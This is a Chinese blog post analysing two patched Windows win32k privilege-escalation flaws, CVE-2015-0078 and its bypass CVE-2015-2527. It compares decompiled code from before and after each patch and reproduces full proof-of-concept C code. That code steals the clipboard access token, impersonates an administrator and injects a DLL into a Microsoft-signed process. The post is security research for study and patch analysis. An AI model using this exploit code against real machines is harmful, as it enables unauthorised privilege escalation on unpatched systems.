【微软漏洞分析】MS15-023 Win32k 特权提升漏洞 - CVE-2015-0078 + 绕过(CVE-2015-2527 in MS15-097)

最新推荐文章于 2024-11-05 19:07:11 发布
最新推荐文章于 2024-11-05 19:07:11 发布
阅读量689 收藏
点赞数 1
分类专栏: 微软漏洞分析 文章标签: microsoft 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fastergohome/article/details/127766836
版权

目录

MS15-023

CVE-2015-0078 微软漏洞描述

Windows 内核模式驱动程序中存在一个特权提升漏洞,该漏洞是由于内核模式驱动程序未能正确验证调用线程的令牌而导致的。

成功利用此漏洞的经过身份验证的攻击者可以获得管理员凭据并使用它们来提升权限。然后攻击者可以安装程序;查看、更改或删除数据;或创建具有完全管理权限的新帐户。要利用此漏洞,攻击者首先必须登录系统。然后,攻击者可以运行旨在提高权限的特制应用程序。此更新通过更正内核模式驱动程序验证调用线程令牌的方式来解决漏洞。

漏洞作者分析

NtUserGetClipboardAccessToken win32k 系统调用将最后一个用户的访问令牌公开给低权限用户。它还可用于打开通常 OpenThreadToken 不应该做的匿名模拟线程令牌。
NtUserGetClipboardAccessToken 方法打开一个令牌对象,该对象在 NtUserCloseClipboard 系统调用期间捕获,假设调用者已将某些内容写入剪贴板。

补丁分析

我们这里以windows 7的x86的补丁分析,补丁解开之后的目录列表如下:

  • ms15-023\x86\win32k_6.3.9600.17694
    • win32k.sys

win32k.sys

主要包括一个更新函数:

  1. NtUserGetClipboardAccessToken

NtUserGetClipboardAccessToken

更新前

BOOL __stdcall NtUserGetClipboardAccessToken(int a1, ACCESS_MASK DesiredAccess)
{
  int v2; // edx
  BOOL v3; // ebx
  void *v4; // ecx
  void **v5; // ecx
  void *Handle; // [esp+18h] [ebp-1Ch] BYREF
  CPPEH_RECORD ms_exc; // [esp+1Ch] [ebp-18h]
  Handle = 0;
  EnterCrit(1);
  if ( sub_BF190(
         *(_DWORD *)(*(_DWORD *)(gptiCurrent + 200) + 456),
         *(_DWORD *)(*(_DWORD *)(gptiCurrent + 200) + 460),
         0x2000,
         -1)
    && (v4 = *(void **)(*(_DWORD *)(*(_DWORD *)(*(_DWORD *)v2 + 216) + 12) + 68)) != 0 )
  {
    v3 = ObOpenObjectByPointer(v4, 0, 0, DesiredAccess, (POBJECT_TYPE)SeTokenObjectType, 1, &Handle) >= 0;
    ms_exc.registration.TryLevel = 0;
    v5 = (void **)a1;
    if ( (unsigned int)a1 >= W32UserProbeAddress )
      v5 = (void **)W32UserProbeAddress;
    *v5 = Handle;
    ms_exc.registration.TryLevel = -2;
  }
  else
  {
    v3 = 0;
    sub_66C6A(5);
  }
  UserSessionSwitchLeaveCrit();
  return v3;
}

更新后

BOOL __stdcall NtUserGetClipboardAccessToken(int a1, ACCESS_MASK DesiredAccess)
{
  int v2; // eax
  BOOL v3; // ebx
  void *v4; // ecx
  void **v5; // ecx
  void *Handle; // [esp+18h] [ebp-1Ch] BYREF
  CPPEH_RECORD ms_exc; // [esp+1Ch] [ebp-18h]
  Handle = 0;
  EnterCrit();
  v2 = PsGetCurrentProcessWin32Process();
  if ( (IsImmersiveBroker(v2)
     || CheckAccessForIntegrityLevel(
          *(_DWORD *)(*(_DWORD *)(gptiCurrent + 200) + 456),
          *(_DWORD *)(*(_DWORD *)(gptiCurrent + 200) + 460),
          0x2000,
          -1))
    && (v4 = *(void **)(*(_DWORD *)(*(_DWORD *)(gptiCurrent + 216) + 12) + 68)) != 0 )
  {
    v3 = ObOpenObjectByPointer(v4, 0, 0, DesiredAccess, (POBJECT_TYPE)SeTokenObjectType, 1, &Handle) >= 0;
    ms_exc.registration.TryLevel = 0;
    v5 = (void **)a1;
    if ( (unsigned int)a1 >= W32UserProbeAddress )
      v5 = (void **)W32UserProbeAddress;
    *v5 = Handle;
    ms_exc.registration.TryLevel = -2;
  }
  else
  {
    v3 = 0;
    sub_511AC(5);
  }
  UserSessionSwitchLeaveCrit();
  return v3;
}

重点分析

增加了两个校验函数IsImmersiveBroker和CheckAccessForIntegrityLevel,只要符合其中之一就可以通过。

PoC分析

执行过程为:

  1. 获取GetClipboardAccessToken的dll调用地址
  2. GetProcessToken获取当前进程句柄
  3. GetTokenIntegrityLevel获取当前进程完整性级别(IL)
  4. GetAdminSid获取管理员SID
  5. 调用GetClipboardAccessToken获取令牌Token
  6. DuplicateTokenEx复制模拟令牌Token
  7. CheckTokenMembership检查令牌是否管理员
  8. SetTokenIL设置令牌的IL为当前进程IL
  9. ImpersonateLoggedOnUser用复制的令牌进行模拟登录
  10. CreateFile在系统目录创建文件

可以看到通过PoC的执行,可以验证复制出来的令牌已经具有管理员权限。

具体代码参考下面:

int _tmain(int argc, _TCHAR* argv[])
{
	_GetClipboardAccessToken f_GetClipboardAccessToken = (_GetClipboardAccessToken)GetProcAddress(LoadLibrary(L"user32.dll"), "GetClipboardAccessToken");	
	HANDLE hProcess = GetProcessToken();
	DWORD curr_il = GetTokenIntegrityLevel(hProcess);
	
	if (f_GetClipboardAccessToken)
	{
		typed_buffer_ptr<SID> adminSid;
		
		if (!GetAdminSid(adminSid))
		{
			printf("Error getting admin sid\n");
		}

		printf("Perform a copy in an elevated process window\n");

		while (true)
		{
			HANDLE hToken;

			if (f_GetClipboardAccessToken(&hToken, MAXIMUM_ALLOWED))
			{			
				HANDLE hImpToken;
					
				if (DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, nullptr, SecurityImpersonation, TokenImpersonation, &hImpToken))
				{										
					BOOL isMember;
					if (CheckTokenMembership(hImpToken, adminSid, &isMember) && isMember)
					{
						if (SetTokenIL(hImpToken, curr_il))
						{
							if (ImpersonateLoggedOnUser(hImpToken))
							{
								HANDLE hFile = CreateFile(L"c:\\windows\\test.txt", GENERIC_READ | GENERIC_WRITE, 0, nullptr, CREATE_ALWAYS, 0, 0);
								if (hFile != INVALID_HANDLE_VALUE)
								{
									printf("Opened file: %p\n", hFile);
									CloseHandle(hFile);
									break;
								}
								else
								{
									printf("Error: %d\n", GetLastError());
								}
							}
							else
							{
								printf("Error impersonating %d\n", GetLastError());
							}
						}
						else
						{
							printf("Error setting IL\n");
						}						
					}

					CloseHandle(hImpToken);
				}
				else
				{
					printf("Error duplicating: %d\n", GetLastError());
				}				

				CloseHandle(hToken);
			}			
			
			Sleep(1000);
		}
	}
	else
	{
		printf("GetClipboardAccessToken doesn't exist, not Windows 8.1?\n");
	}

	return 0;
}

MS15-097

CVE-2015-2527 微软漏洞描述

当 Windows 内核模式驱动程序 (Win32k.sys) 在某些进程初始化场景中无法正确验证和强制执行完整性级别时,存在特权提升漏洞。成功利用该漏洞的攻击者可以在内核模式下运行任意代码。然后攻击者可以安装程序;查看、更改或删除数据;或创建具有完全用户权限的新帐户。

要利用此漏洞,攻击者首先必须登录系统。然后,攻击者可以运行特制的应用程序,该应用程序可以利用该漏洞并控制受影响的系统。

漏洞作者分析

据说这在 MS15-023 中被修复为 CVE-2015-0078,以防止运行在中等 IL 以下的任何进程访问令牌。检查大致是:

if(IsImmersiveBroker() || CheckAccessForIntegrityLevelEx(0x2000)) {
ObOpenObjectByPointer(WinStationObject->ClipboardAccessToken, Access, TokenHandle);
}

这是可以绕过的,因为 IsImmersiveBroker 级别很容易获得。似乎 Win32k 在首次初始化进程并将其转换为 GUI 线程时设置了适当的 Win32Process 标志。如果可执行文件由 Microsoft 证书签名并且有一个特别命名的“.imrsiv”部分,则将设置该标志,但是无论进程的 IL 是什么,都会执行此操作。因此,您可以使用预签名的可执行文件之一创建进程,例如 explorer.exe、RuntimeBroker.exe 或 LicensingUI.exe,然后将 DLL 注入进程。这允许您绕过检查并捕获令牌。

补丁分析

更新函数和之前一致,更新后代码如下:

BOOL __stdcall NtUserGetClipboardAccessToken(int a1, ACCESS_MASK DesiredAccess)
{
  BOOL v2; // ebx
  void *v3; // ecx
  HDC v4; // ecx
  void *Handle; // [esp+10h] [ebp-20h] BYREF
  char v7; // [esp+17h] [ebp-19h] BYREF
  CPPEH_RECORD ms_exc; // [esp+18h] [ebp-18h]

  Handle = 0;
  EnterLeaveCrit::EnterLeaveCrit((EnterLeaveCrit *)&v7);
  
  
  if ( CheckAccessForIntegrityLevel(
         *(_DWORD *)(*(_DWORD *)(gptiCurrent + 196) + 456),
         *(_DWORD *)(*(_DWORD *)(gptiCurrent + 196) + 460),
         0x2000,
         -1)
    && (v3 = *(void **)(*(_DWORD *)(*(_DWORD *)(gptiCurrent + 212) + 12) + 68)) != 0 )
  {
    v2 = ObOpenObjectByPointer(v3, 0, 0, DesiredAccess, (POBJECT_TYPE)SeTokenObjectType, 1, &Handle) >= 0;
    ms_exc.registration.TryLevel = 0;
    v4 = (HDC)a1;
    if ( a1 >= (unsigned int)W32UserProbeAddress )
      v4 = W32UserProbeAddress;
    *(_DWORD *)v4 = Handle;
    ms_exc.registration.TryLevel = -2;
  }
  else
  {
    v2 = 0;
    UserSetLastError(5);
  }
  UserSessionSwitchLeaveCrit();
  return v2;
}

可以注意到只是删除了校验函数IsImmersiveBroker的调用,将之前的两种条件改为一种。

我们看下校验函数IsImmersiveBroker的代码:

BOOL __usercall IsImmersiveBroker@<eax>(int a1@<ecx>, struct _EPROCESS *a2@<esi>)
{
  PRKPROCESS v2; // esi
  BOOL result; // eax

  if ( gfIgnoreMoshHardening )
    return (*(_BYTE *)(a1 + 424) & 0x30) != 16;
  if ( (*(_DWORD *)(a1 + 424) & 0x30) == 32 )
    return 1;
  v2 = *(PRKPROCESS *)a1;
  if ( _IsProcessDwm(a2) )
    result = 1;
  else
    result = v2 == gpepCSRSS;
  return result;
}

这个函数主要的校验是Microsoft 证书签名和判断是否是dwm.exe和csrss.exe。

PoC分析

主函数的作用是创建LicensingUI.exe进程,并将Dll inject到LicensingUI.exe进程。

int _tmain(int argc, _TCHAR* argv[])
{	
	HANDLE hToken;
	OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken);

	if (GetTokenIntegrityLevel(hToken) >= SECURITY_MANDATORY_MEDIUM_RID)
	{
		printf("ERROR: You should run this as low integrity to demonstrate the issue\n");
		return 1;
	}

	std::wstring path = GetExecutableDir();
	path += L"\\injected.dll";

	STARTUPINFO startInfo = { 0 };
	PROCESS_INFORMATION procInfo = { 0 };
	WCHAR cmdline[] = L"LicensingUI.exe";

	startInfo.cb = sizeof(startInfo);

	if (CreateProcess(nullptr, cmdline, nullptr, nullptr, FALSE, CREATE_SUSPENDED, nullptr, nullptr, &startInfo, &procInfo))
	{
		InjectDll(procInfo.hProcess, procInfo.hThread, path);		
		ResumeThread(procInfo.hThread);				
	}	
	else
	{
		printf("Error creating process %d\n", GetLastError());
	}

	return 0;
}

继续看inject Dll的代码,执行过程为:

  1. 获取GetClipboardAccessToken的dll调用地址
  2. GetAdminSid获取管理员SID
  3. 调用GetClipboardAccessToken获取令牌Token
  4. GetTokenIntegrityLevel查询令牌的完整性级别
DWORD CALLBACK DoExploit(LPVOID arg)
{
	_GetClipboardAccessToken f_GetClipboardAccessToken = (_GetClipboardAccessToken)GetProcAddress(LoadLibrary(L"user32.dll"), "GetClipboardAccessToken");
	
	if (f_GetClipboardAccessToken)
	{
		typed_buffer_ptr<SID> adminSid;

		if (!GetAdminSid(adminSid))
		{
			DebugPrintf("Error getting admin sid\n");
		}

		DebugPrintf("Perform a copy in an elevated process window\n");

		while (true)
		{
			HANDLE hToken;

			if (f_GetClipboardAccessToken(&hToken, MAXIMUM_ALLOWED))
			{		
				DWORD il = GetTokenIntegrityLevel(hToken);
				if (il >= SECURITY_MANDATORY_MEDIUM_RID)
				{
					DebugPrintf("Captured token %p with IL of %08X\n", hToken, il);
					MessageBox(nullptr, L"Captured a User Token", L"Message", MB_ICONEXCLAMATION);
					break;
				}									
			
				CloseHandle(hToken);
			}

			Sleep(1000);
		}
	}
	else
	{
		DebugPrintf("GetClipboardAccessToken doesn't exist, not Windows 8.1?\n");
	}	

	//FreeLibraryAndExitThread((HMODULE)arg, 0);
	ExitProcess(1);
}



BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
					 )
{
	DebugPrintf("In DllMain\n");
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
		CreateThread(nullptr, 0, DoExploit, hModule, 0, 0);
		break;
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}

参考

https://bugs.chromium.org/p/project-zero/issues/detail?id=219
https://bugs.chromium.org/p/project-zero/issues/detail?id=461
https://learn.microsoft.com/en-us/security-updates/securitybulletins/2015/ms15-023
https://learn.microsoft.com/en-us/security-updates/securitybulletins/2015/ms15-097

3riC5r
关注
专栏目录
HTTP.sys远程执行代码漏洞验证及复现——CVE-2015-1635、MS15-034
7Riven's blog
12-07 2万+
目录 漏洞概述 漏洞环境部署 漏洞验证 漏洞利用:ms15_034 漏洞防御 漏洞概述 HTTP.sys简介 HTTP.sys是Microsoft Windows处理HTTP请求的内核驱动程序,为了优化IIS服务器性能,从IIS6.0引入,IIS服务进程依赖HTTP.sys。HTTP.sys远程代码执行漏洞实质是HTTP.sys的整数溢出漏洞 漏洞成因 远程执行代码漏洞存在于 ...
微软漏洞分析MS15-010 CNG 安全功能绕过漏洞 - CVE-2015-0010
重新启程
11-04 710
微软漏洞分析序列,通过补丁分析找出问题点,这个漏洞是一个漏洞攻击面的第一篇文章。
微软Win32K权限提升漏洞修复处理
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
03-08 1300
大多数情况下,x64 和 x86-64 处理器的性能没有显着差异。x64 和 x86-64 是同一种 64 位计算机架构,没有实际区别,主要取决于处理器制造商。x64 和 x86-64 都支持 64 位寻址,这意味着它们可以访问比 32 位架构更多的内存(高达 2^64 字节)。x64 和 x86-64 都向后兼容 32 位应用程序,这意味着它们可以在 64 位系统上运行 32 位软件。x86-64 是英特尔对 x64 架构的名称,用于其酷睿 2 处理器。它们都是 64 位计算机架构的两种名称。
CVE-2022-21882 Win32k内核提权漏洞深入分析
m0_71745258的博客
01-29 344
CVE-2022-21882是对CVE-2021-1732漏洞绕过,属于win32k驱动程序中的一个类型混淆漏洞。攻击者可以在user_mode调用相关的GUIAPI进行内核调用,如xxxMenuWindowProc、xxxSBWndProc、xxxSwitchWndProc、xxxTooltipWndProc等,这些内核函数会触发回调xxxClientAllocWindowClassExtraBytes。攻击者可以通过hook。
[CVE-2021-1732] win32k内核提权漏洞分析
further_eye的博客
04-23 1115
CVE-2021-1732是今年二月份被披露的蔓灵花(BITTER)APT组织在某次攻击行动中使用的0Day漏洞【1】【2】【3】。该漏洞利用Windows操作系统win32k内核模块一处用户态回调机会,破坏函数正常执行流程,造成窗口对象扩展数据的属性设置错误,最终导致内核空间的内存越界读写。当受影响版本的Windows操作系统用户执行攻击者构造的利用样本时,将会触发该漏洞,造成本地权限提升【4】。 1. 漏洞原理分析 CVE-2021-1732漏洞形成的根本原因是: Windows窗口创建(C.
漏洞复习】永恒之黑
syhsa的博客
04-18 1698
总的来说,“永恒之黑”漏洞揭示了网络安全中的一个重要问题,即即使是由政府部门开发的漏洞工具,一旦泄露,也可能被黑客和恶意分子利用,对网络安全构成严重威胁。“永恒之黑”漏洞利用了微软Windows操作系统中的漏洞,主要是针对 SMB(Server Message Block)协议的漏洞。通过利用这些漏洞,攻击者可以远程执行代码,而无需用户交互,从而控制受感染的计算机。微软在意识到漏洞的严重性后,发布了紧急补丁来修复这些漏洞,建议用户尽快更新其Windows操作系统,以防止受到攻击的风险。
windows【提权系列】— CVE-2016-7255(1)
2301_82243828的博客
05-17 994
攻击者利用该漏洞,可在未授权的情况下实现以本地系统账户权限执行任意代码。目前,厂商针对该漏洞已发布安全补丁。成功利用此漏洞的攻击者可以在内核模式下运行任意代码。然后攻击者可以运行一个为利用这些漏洞而经特殊设计的应用程序,从而控制受影响的系统。该更新通过更正 Windows 内核模式驱动程序处理内存中对象的方式来解决这些漏洞。官方补丁地址为:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2016-7255。
MS15-034漏洞检测工具-PY脚本
04-18
IIS高风险漏洞MS15-034的POC,可利用脚本检测漏洞是否存在。
CVE-2015-1635、MS15-034(Http.sys的利用工具)
11-10
利用 Http.sys 驱动对urlacl进行操作,由于Http.sys是IIS服务器的基础,其优先级高于IIS,不会造成端口bind冲突,达到端口服用效果,由于与受害机对外服务端口相同,可做到极高的隐蔽性。由于其生效后效果很类似于...
HTTP.sys远程代码执行漏洞(MS15-034)(CVE-2015-1635) 漏洞修复
08-21
Microsoft Windows HTTP.sys远程代码执行漏洞 (MS15-034)(CVE-2015-1635)
Microsoft Windows Win32k本地提权漏洞分析
further_eye的博客
11-27 884
MicrosoftWindows内核模式驱动程序中存在特权提升漏洞,该漏洞源于程序没有正确地处理内存中的对象。本地攻击者可利用该漏洞在内核模式下运行任意代码。
Windows内核溢出漏洞提权
谢公子的博客
02-12 7006
目录 内核溢出漏洞提权 实战MSF中CVE-2018-8120模块本地溢出漏洞提权 查看系统补丁 选择利用模块攻击 内核溢出漏洞提权 本地溢出提权首先要有服务器的一个普通用户权限,攻击者通常会向服务器上传本地溢出程序,在服务器端执行,如果系统存在漏洞,那么将溢出Administrator权限。以下是不同系统提权的漏洞和相应的补丁。 github上windows系统溢出漏洞提权的汇总...
EXP查询合集提权后渗透必备-------后渗透提权常用漏洞
L_lemo004的博客
10-20 705
后渗透提权常用漏洞 CVE-2019-0803 [An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory] (Windows 7/8/10/2008/2012/2016/2019) CVE-2018-8639 [An elevation of privilege vulnerability exists in
KB编号、MS编号、CVE编号的区别
weixin_63137680的博客
10-27 2390
KB编号、MS编号、CVE编号的含义
解决 Hypack 安装不能正常运行的引导及微软 VC++ 运行库 VCRedist
中游鱼的博客
11-02 1073
解决 Hypack 安装不能正常运行的引导及微软 VC++ 运行库 VCRedist。 本文以 Hypack 2016 安装后无法正常运行为例。
Multi Agents协作机制设计及实践
最新发布
weixin_43990004的博客
11-05 577
在前述博客中,我们利用LangChain、AutoGen等开发框架构建了一个数据多智能体的平台,并使用了LangChain的Multi-Agents框架。然而,在实施过程中,我们发现现有的框架存在一些局限性,这些局限性影响了系统的整体性能和用户体验。本文将从多智能体协作的重要性、协作机制的难点以及应用方向三个方面进行详细阐述。
qt QDialog详解
ckg3824278的博客
11-01 529
QDialog是Qt框架中用于创建对话框的类,它继承自QWidget。QDialog提供了一个模态或非模态的对话框,用于与用户进行交互。模态对话框会阻塞其他窗口的输入,直到用户关闭该对话框;而非模态对话框则允许用户同时与多个窗口进行交互。QDialog可以包含各种控件,如按钮、文本框、标签等,用于收集用户输入或显示信息。
[QUIC] 版本协商
VFSSoft Blogs
11-05 256
QUIC 版本协商的工作原理
QCustomPlot添加自定义的图例,实现隐藏、删除功能(一)
MusicScore的博客
11-05 406
要实现一个支持勾选并可以控制曲线显示和隐藏的自定义QCPLegend类,可以通过继承QCPLegend并重写其相关方法来实现。我们需要添加一个自定义的复选框元素,并捕捉用户交互来实现曲线的隐藏和显示。
Microsoft Windows HTTP.sys远程代码执行漏洞(MS15-034)(CVE-2015-1635)【原理扫描】
05-24
Microsoft Windows HTTP.sys远程代码执行漏洞(MS15-034)(CVE-2015-1635)是一种存在于HTTP协议栈中的安全漏洞,可以导致远程攻击者在未经身份验证的情况下以SYSTEM权限执行任意代码。攻击者可以通过发送特制的HTTP请求来利用该漏洞。 该漏洞的原理是在HTTP.sys驱动程序中存在一个缓冲区溢出漏洞,攻击者可以通过发送特制的HTTP请求来触发该漏洞。当HTTP.sys驱动程序接收到特制的HTTP请求时,它会尝试解析请求头,并将其复制到缓冲区中。但如果请求头中包含了一些特定的数据,就会导致缓冲区溢出,从而使攻击者能够执行任意代码。 为了检测该漏洞,可以使用一些漏洞扫描工具,如Nessus、OpenVAS等。这些工具可以通过发送特制的HTTP请求来检测目标系统是否存在该漏洞。 同时,为了防止该漏洞的利用,可以采取以下措施: 1. 安装Microsoft发布的安全补丁; 2. 禁用WebDAV; 3. 配置网络防火墙,限制HTTP请求的访问权限; 4. 使用WAF(Web应用程序防火墙)等安全设备,对HTTP请求进行过滤和检查。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值